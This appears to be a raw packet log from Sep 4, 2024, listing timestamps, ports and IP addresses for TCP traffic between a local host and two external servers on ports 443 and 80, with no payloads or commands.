Sep 4, 2024 17:37:10.515732050 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515748024 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515779972 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.515784979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515808105 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.515815020 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.515885115 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515898943 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515928030 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.515934944 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515944958 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.515971899 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.516932964 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.516946077 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.516984940 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.516990900 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.517003059 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.517021894 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.517220974 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.517234087 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.517267942 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.517273903 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.517328978 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.517587900 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.517606020 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.517631054 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.517637014 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.517652988 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.517673969 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.518003941 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.518018007 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.518054008 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.518060923 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.518085003 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.518100023 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.518276930 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.518290043 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.518320084 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.518326044 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.518351078 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.518368006 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.546142101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546154976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546175003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546185017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546195030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546206951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546209097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546220064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546243906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546256065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546314001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546334982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546346903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546353102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546359062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546370029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546371937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546380997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546381950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546401978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546418905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546467066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546545029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546555996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546566010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546576977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546581030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546588898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546590090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546602011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546612024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546633005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546654940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546667099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546700001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546801090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546816111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546828032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546839952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546839952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546850920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546859026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546864986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546875000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546880960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546904087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546911001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546935081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546946049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546956062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.546974897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.546998978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547043085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547055006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547065973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547076941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547087908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547100067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547110081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547339916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547545910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547555923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547564983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547575951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547585964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547588110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547596931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547597885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547610044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547620058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547620058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547631979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547641993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547646999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547665119 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547672987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.547847986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547858953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547868967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547879934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547900915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547911882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547920942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547931910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547943115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547952890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547964096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547972918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547981977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.547992945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548002005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548012972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548013926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548044920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548049927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548058987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548062086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548074961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548083067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548086882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548098087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548100948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548109055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548119068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548129082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548137903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548141956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548152924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548162937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548175097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548177958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548186064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548194885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548207998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548216105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548218966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548226118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548233032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548257113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548281908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548548937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548559904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548569918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548579931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548590899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548598051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548600912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548613071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548614979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548626900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548628092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548640013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548646927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548650980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548662901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548671961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548681021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548685074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548695087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548707962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548710108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548721075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548727989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548733950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548734903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548747063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548757076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548758030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548768997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.548784018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548790932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.548815012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.549209118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549221039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549231052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549242020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549252033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549262047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549273968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549284935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549298048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549309969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549324036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549335957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549349070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549360037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.549424887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.596678019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596698999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596709967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596738100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.596777916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.596791983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596803904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596818924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596828938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596837997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596837997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.596848011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.596869946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.596956015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596968889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.596993923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597012997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597088099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597100019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597109079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597119093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597189903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597197056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597208023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597217083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597227097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597232103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597243071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597321987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597374916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597385883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597394943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597404003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597413063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597426891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597426891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597436905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597441912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597460032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597481012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597645998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597656965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597666025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597675085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597688913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597697973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597706079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597714901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597722054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597729921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597734928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597740889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597752094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597762108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597773075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597795010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597862959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597875118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597883940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597893953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597903013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597912073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597912073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597922087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597924948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597933054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597942114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597944975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597958088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597960949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.597984076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.597995043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598179102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598198891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598208904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598217964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598221064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598227978 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598231077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598242044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598247051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598253012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598253965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598264933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598272085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598277092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598284960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598287106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598298073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598306894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598309040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598326921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598342896 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598409891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598421097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598429918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598442078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598454952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598467112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598493099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598551035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598562002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598571062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598581076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598591089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598603010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598612070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598614931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598642111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598650932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598817110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598828077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598845005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598855019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598864079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598871946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598879099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598886013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598891020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598898888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598905087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598907948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598921061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.598925114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598932028 CEST	80	49717	147.45.44.104	192.168.2.6
